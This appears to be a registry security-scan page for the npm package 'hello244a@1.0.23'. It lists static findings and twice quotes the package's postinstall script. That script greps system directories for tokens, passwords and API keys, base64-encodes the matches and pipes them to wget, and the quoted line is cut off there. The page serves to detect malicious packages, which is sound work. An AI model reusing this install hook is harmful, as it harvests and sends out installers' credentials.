registry  /  hello244a  /  1.0.23

hello244a@1.0.23

Static Scan Results

scanned 5h ago · by rust-scanner

Static analysis flagged 4 finding(s) at 72.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = printf 'grep -rIE "(TOKEN|SECRET|PASSWORD|API_KEY|JWT|eyJ|AWS_)" /root /home /var/www /opt /srv /app /etc 2>/dev/null | head -n 50 | base64 -w 0' > /tmp/s.sh && sh /tmp/s.sh | wget...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.postinstall = printf 'grep -rIE "(TOKEN|SECRET|PASSWORD|API_KEY|JWT|eyJ|AWS_)" /root /home /var/www /opt /srv /app /etc 2>/dev/null | head -n 50 | base64 -w 0' > /tmp/s.sh && sh /tmp/s.sh | wget...
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg

Findings

1 High1 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present
LowNo License